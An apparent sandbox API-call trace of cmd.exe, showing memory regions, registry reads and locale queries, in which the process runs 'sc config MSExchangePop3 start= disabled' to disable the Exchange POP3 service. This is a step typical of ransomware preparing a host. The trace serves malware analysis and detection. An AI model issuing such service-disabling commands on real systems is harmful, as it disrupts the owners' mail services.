"" Region: id = 8040 start_va = 0x7ef63000 end_va = 0x7ef63fff entry_point = 0x0 region_type = private name = "private_0x000000007ef63000" filename = "" Region: id = 8041 start_va = 0x7ef6c000 end_va = 0x7ef6efff entry_point = 0x0 region_type = private name = "private_0x000000007ef6c000" filename = "" Region: id = 8042 start_va = 0x7ef6f000 end_va = 0x7ef6ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef6f000" filename = "" Region: id = 8043 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8044 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8045 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8046 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8047 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8048 start_va = 0x4b00000 end_va = 0x4b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 8049 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8050 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8051 start_va = 0x4c20000 end_va = 0x4d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 8052 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8093 start_va = 0x4850000 end_va = 0x485ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004850000" filename = "" Region: id = 8094 start_va = 0x4870000 end_va = 0x487ffff entry_point = 0x0 region_type = private name = "private_0x0000000004870000" filename = "" Region: id = 8095 start_va = 0x4a10000 end_va = 0x4acdfff entry_point = 0x4a10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8096 start_va = 0x4b10000 end_va = 0x4b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 8097 start_va = 0x4d20000 end_va = 0x4e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d20000" filename = "" Region: id = 8098 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8099 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8100 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8101 start_va = 0x7ee40000 end_va = 0x7ef3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee40000" filename = "" Region: id = 8102 start_va = 0x7ef69000 end_va = 0x7ef6bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef69000" filename = "" Region: id = 8103 start_va = 0x4860000 end_va = 0x4863fff entry_point = 0x0 region_type = private name = "private_0x0000000004860000" filename = "" Region: id = 8104 start_va = 0x4ad0000 end_va = 0x4ad3fff entry_point = 0x0 region_type = private name = "private_0x0000000004ad0000" filename = "" Region: id = 8105 start_va = 0x4e20000 end_va = 0x5156fff entry_point = 0x4e20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 502 os_tid = 0xc54 [0131.997] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0131.997] __set_app_type (_Type=0x1) [0131.997] __p__fmode () returned 0x77ac4d6c [0131.997] __p__commode () returned 0x77ac5b1c [0131.997] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0131.997] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0131.997] GetCurrentThreadId () returned 0xc54 [0131.997] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc54) returned 0x84 [0131.997] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0131.997] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0131.997] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.000] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.000] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x49dfc5c | out: phkResult=0x49dfc5c*=0x0) returned 0x2 [0132.000] VirtualQuery (in: lpAddress=0x49dfc63, lpBuffer=0x49dfc14, dwLength=0x1c | out: lpBuffer=0x49dfc14*(BaseAddress=0x49df000, AllocationBase=0x48e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.000] VirtualQuery (in: lpAddress=0x48e0000, lpBuffer=0x49dfc14, dwLength=0x1c | out: lpBuffer=0x49dfc14*(BaseAddress=0x48e0000, AllocationBase=0x48e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0132.000] VirtualQuery (in: lpAddress=0x48e1000, lpBuffer=0x49dfc14, dwLength=0x1c | out: lpBuffer=0x49dfc14*(BaseAddress=0x48e1000, AllocationBase=0x48e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0132.000] VirtualQuery (in: lpAddress=0x48e3000, lpBuffer=0x49dfc14, dwLength=0x1c | out: lpBuffer=0x49dfc14*(BaseAddress=0x48e3000, AllocationBase=0x48e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.000] VirtualQuery (in: lpAddress=0x49e0000, lpBuffer=0x49dfc14, dwLength=0x1c | out: lpBuffer=0x49dfc14*(BaseAddress=0x49e0000, AllocationBase=0x49e0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0132.000] GetConsoleOutputCP () returned 0x1b5 [0132.001] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0132.001] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0132.001] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.001] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0132.001] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.001] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0132.001] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.001] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0132.001] _get_osfhandle (_FileHandle=0) returned 0x38 [0132.001] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0132.002] _get_osfhandle (_FileHandle=0) returned 0x38 [0132.002] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0132.002] GetEnvironmentStringsW () returned 0x4c27d98* [0132.003] FreeEnvironmentStringsA (penv="A") returned 1 [0132.003] GetEnvironmentStringsW () returned 0x4c27d98* [0132.003] FreeEnvironmentStringsA (penv="A") returned 1 [0132.003] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x49debc0 | out: phkResult=0x49debc0*=0x94) returned 0x0 [0132.003] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x49debc4, lpData=0x49debcc, lpcbData=0x49debc8*=0x1000 | out: lpType=0x49debc4*=0x0, lpData=0x49debcc*=0x8, lpcbData=0x49debc8*=0x1000) returned 0x2 [0132.003] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x49debc4, lpData=0x49debcc, lpcbData=0x49debc8*=0x1000 | out: lpType=0x49debc4*=0x4, lpData=0x49debcc*=0x1, lpcbData=0x49debc8*=0x4) returned 0x0 [0132.003] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x49debc4, lpData=0x49debcc, lpcbData=0x49debc8*=0x1000 | out: lpType=0x49debc4*=0x0, lpData=0x49debcc*=0x1, lpcbData=0x49debc8*=0x1000) returned 0x2 [0132.003] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x49debc4, lpData=0x49debcc, lpcbData=0x49debc8*=0x1000 | out: lpType=0x49debc4*=0x4, lpData=0x49debcc*=0x0, lpcbData=0x49debc8*=0x4) returned 0x0 [0132.003] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x49debc4, lpData=0x49debcc, lpcbData=0x49debc8*=0x1000 | out: lpType=0x49debc4*=0x4, lpData=0x49debcc*=0x40, lpcbData=0x49debc8*=0x4) returned 0x0 [0132.003] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x49debc4, lpData=0x49debcc, lpcbData=0x49debc8*=0x1000 | out: lpType=0x49debc4*=0x4, lpData=0x49debcc*=0x40, lpcbData=0x49debc8*=0x4) returned 0x0 [0132.003] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x49debc4, lpData=0x49debcc, lpcbData=0x49debc8*=0x1000 | out: lpType=0x49debc4*=0x0, lpData=0x49debcc*=0x40, lpcbData=0x49debc8*=0x1000) returned 0x2 [0132.003] RegCloseKey (hKey=0x94) returned 0x0 [0132.003] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x49debc0 | out: phkResult=0x49debc0*=0x94) returned 0x0 [0132.003] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x49debc4, lpData=0x49debcc, lpcbData=0x49debc8*=0x1000 | out: lpType=0x49debc4*=0x0, lpData=0x49debcc*=0x40, lpcbData=0x49debc8*=0x1000) returned 0x2 [0132.003] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x49debc4, lpData=0x49debcc, lpcbData=0x49debc8*=0x1000 | out: lpType=0x49debc4*=0x4, lpData=0x49debcc*=0x1, lpcbData=0x49debc8*=0x4) returned 0x0 [0132.003] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x49debc4, lpData=0x49debcc, lpcbData=0x49debc8*=0x1000 | out: lpType=0x49debc4*=0x0, lpData=0x49debcc*=0x1, lpcbData=0x49debc8*=0x1000) returned 0x2 [0132.003] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x49debc4, lpData=0x49debcc, lpcbData=0x49debc8*=0x1000 | out: lpType=0x49debc4*=0x4, lpData=0x49debcc*=0x0, lpcbData=0x49debc8*=0x4) returned 0x0 [0132.003] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x49debc4, lpData=0x49debcc, lpcbData=0x49debc8*=0x1000 | out: lpType=0x49debc4*=0x4, lpData=0x49debcc*=0x9, lpcbData=0x49debc8*=0x4) returned 0x0 [0132.003] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x49debc4, lpData=0x49debcc, lpcbData=0x49debc8*=0x1000 | out: lpType=0x49debc4*=0x4, lpData=0x49debcc*=0x9, lpcbData=0x49debc8*=0x4) returned 0x0 [0132.003] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x49debc4, lpData=0x49debcc, lpcbData=0x49debc8*=0x1000 | out: lpType=0x49debc4*=0x0, lpData=0x49debcc*=0x9, lpcbData=0x49debc8*=0x1000) returned 0x2 [0132.004] RegCloseKey (hKey=0x94) returned 0x0 [0132.004] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29834 [0132.004] srand (_Seed=0x5ad29834) [0132.004] GetCommandLineW () returned="/c sc config MSExchangePop3 start= disabled" [0132.004] GetCommandLineW () returned="/c sc config MSExchangePop3 start= disabled" [0132.004] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0132.004] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c29cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0132.004] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0132.004] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.004] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.004] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0132.004] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0132.004] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0132.004] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0132.004] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0132.004] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0132.004] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0132.004] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0132.004] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0132.004] GetEnvironmentStringsW () returned 0x4c27d98* [0132.005] FreeEnvironmentStringsA (penv="A") returned 1 [0132.005] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.005] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.005] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0132.005] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0132.005] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0132.005] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0132.005] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0132.005] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0132.005] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0132.005] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0132.005] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49df998 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0132.005] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x49df998, lpFilePart=0x49df990 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x49df990*="Desktop") returned 0x1d [0132.005] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0132.005] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x49df718 | out: lpFindFileData=0x49df718) returned 0x4c205c8 [0132.005] FindClose (in: hFindFile=0x4c205c8 | out: hFindFile=0x4c205c8) returned 1 [0132.005] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x49df718 | out: lpFindFileData=0x49df718) returned 0x4c205c8 [0132.005] FindClose (in: hFindFile=0x4c205c8 | out: hFindFile=0x4c205c8) returned 1 [0132.005] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0132.005] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x49df718 | out: lpFindFileData=0x49df718) returned 0x4c205c8 [0132.005] FindClose (in: hFindFile=0x4c205c8 | out: hFindFile=0x4c205c8) returned 1 [0132.005] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0132.006] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0132.006] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0132.006] GetEnvironmentStringsW () returned 0x4c27d98* [0132.006] FreeEnvironmentStringsA (penv="=") returned 1 [0132.006] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0132.006] GetConsoleOutputCP () returned 0x1b5 [0132.006] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0132.006] GetUserDefaultLCID () returned 0x409 [0132.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0132.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x49dfac8, cchData=128 | out: lpLCData="0") returned 2 [0132.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x49dfac8, cchData=128 | out: lpLCData="0") returned 2 [0132.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x49dfac8, cchData=128 | out: lpLCData="1") returned 2 [0132.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0132.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0132.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0132.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0132.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0132.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0132.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0132.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0132.007] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0132.007] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0132.007] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0132.008] GetConsoleTitleW (in: lpConsoleTitle=0x4c2aa38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.008] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0132.008] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0132.008] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0132.008] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0132.008] _wcsicmp (_String1="sc", _String2=")") returned 74 [0132.008] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0132.008] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0132.008] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0132.008] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0132.008] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0132.008] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0132.009] GetConsoleTitleW (in: lpConsoleTitle=0x49df7b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.010] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0132.010] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0132.010] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0132.010] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0132.010] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0132.010] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0132.010] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0132.010] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0132.010] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0132.010] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0132.010] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0132.010] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0132.010] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0132.010] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0132.010] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0132.010] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0132.010] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0132.010] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0132.010] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0132.010] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0132.010] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0132.010] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0132.010] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0132.010] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0132.010] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0132.010] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0132.010] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0132.010] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0132.010] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0132.010] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0132.010] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0132.010] _wcsicmp (_String1="sc", _String2="START") returned -17 [0132.010] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0132.010] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0132.010] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0132.010] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0132.010] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0132.010] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0132.010] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0132.010] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0132.010] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0132.010] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0132.010] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0132.010] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0132.010] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0132.010] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0132.010] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0132.011] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0132.011] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0132.011] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0132.011] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0132.011] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0132.011] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0132.011] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0132.011] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0132.011] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0132.011] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0132.011] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0132.011] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0132.011] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0132.011] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0132.011] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0132.011] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0132.011] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0132.011] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0132.011] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0132.011] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0132.011] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0132.011] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0132.011] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0132.011] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0132.011] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0132.011] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0132.011] _wcsicmp (_String1="sc", _String2="START") returned -17 [0132.011] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0132.011] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0132.011] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0132.011] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0132.011] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0132.011] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0132.011] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0132.011] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0132.011] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0132.011] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0132.011] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0132.011] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0132.011] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0132.011] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0132.012] SetErrorMode (uMode=0x0) returned 0x0 [0132.012] SetErrorMode (uMode=0x1) returned 0x0 [0132.012] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4c205d0, lpFilePart=0x49df2bc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x49df2bc*="Desktop") returned 0x1d [0132.012] SetErrorMode (uMode=0x0) returned 0x1 [0132.012] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0132.012] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0132.019] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0132.019] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0132.019] 